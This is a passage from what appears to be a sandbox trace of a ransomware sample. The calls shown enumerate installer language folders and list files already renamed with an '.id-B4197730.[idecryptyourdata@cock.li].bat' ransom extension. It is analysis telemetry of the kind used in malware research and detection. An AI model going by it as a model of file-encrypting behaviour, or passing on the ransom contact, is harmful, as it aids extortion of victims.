ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.725] FindNextFileW (in: hFindFile=0x727e48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdb82020, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdb82020, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdba8199, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xf54, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.725] FindNextFileW (in: hFindFile=0x727e48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfda50d7a, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfda50d7a, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdac340c, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x13c66, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.725] FindNextFileW (in: hFindFile=0x727e48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd565f3a, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd565f3a, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfda50d7a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.726] FindNextFileW (in: hFindFile=0x727e48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd565f3a, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd565f3a, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfda50d7a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.726] FindClose (in: hFindFile=0x727e48 | out: hFindFile=0x727e48) returned 1 [0155.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.727] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1049", cAlternateFileName="")) returned 1 [0155.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.727] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x727e88 [0155.728] FindNextFileW (in: hFindFile=0x727e88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.729] FindNextFileW (in: hFindFile=0x727e88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfda50d7a, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfda50d7a, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdae9669, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xd5a4, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.729] FindNextFileW (in: hFindFile=0x727e88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdae9669, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdae9669, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdb35ae9, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x13f46, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.729] FindNextFileW (in: hFindFile=0x727e88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd5fe9c3, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd5fe9c3, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd5fe9c3, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.729] FindNextFileW (in: hFindFile=0x727e88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd5fe9c3, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd5fe9c3, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd5fe9c3, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.729] FindClose (in: hFindFile=0x727e88 | out: hFindFile=0x727e88) returned 1 [0155.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.730] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1053", cAlternateFileName="")) returned 1 [0155.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.730] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x7283c8 [0155.735] FindNextFileW (in: hFindFile=0x7283c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.735] FindNextFileW (in: hFindFile=0x7283c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdb0f91e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdb0f91e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdb35ae9, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1004, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.736] FindNextFileW (in: hFindFile=0x7283c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdb5be49, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdb5be49, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdb82020, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x13076, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.736] FindNextFileW (in: hFindFile=0x7283c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd5fe9c3, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd5fe9c3, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd624b3b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.736] FindNextFileW (in: hFindFile=0x7283c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd5fe9c3, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd5fe9c3, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd624b3b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.736] FindClose (in: hFindFile=0x7283c8 | out: hFindFile=0x7283c8) returned 1 [0155.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.737] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1055", cAlternateFileName="")) returned 1 [0155.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.738] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x7280c8 [0156.205] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0156.205] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdb5be49, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdb5be49, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdc1aa71, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1004, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.205] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdb82020, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdb82020, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdbf4763, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x12d16, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.206] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd624b3b, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd624b3b, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdba8199, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.206] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd624b3b, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd624b3b, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdba8199, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.206] FindClose (in: hFindFile=0x7280c8 | out: hFindFile=0x7280c8) returned 1 [0156.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0156.207] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="2052", cAlternateFileName="")) returned 1 [0156.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.207] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x728288 [0156.209] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0156.209] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdba8199, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdba8199, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdbce539, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x17b4, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.209] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdbf4763, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdbf4763, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdc8d01d, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xee06, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.209] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd709a28, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd709a28, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd755eac, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.209] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd709a28, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd709a28, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd755eac, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.209] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0156.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.222] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="2070", cAlternateFileName="")) returned 1 [0156.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.222] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x728308 [0156.224] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0156.224] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdc40cc8, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdc40cc8, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdd259f9, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1094, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.224] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdc40cc8, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdc40cc8, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdd0ddaa, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x13a76, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.224] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd755eac, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd755eac, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd77c0d5, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.225] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd755eac, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd755eac, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd77c0d5, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.225] FindClose (in: hFindFile=0x728308 | out: hFindFile=0x728308) returned 1 [0156.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.226] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="3076", cAlternateFileName="")) returned 1 [0156.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.226] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\*", lpFindFileData=0x34ff800 | out: 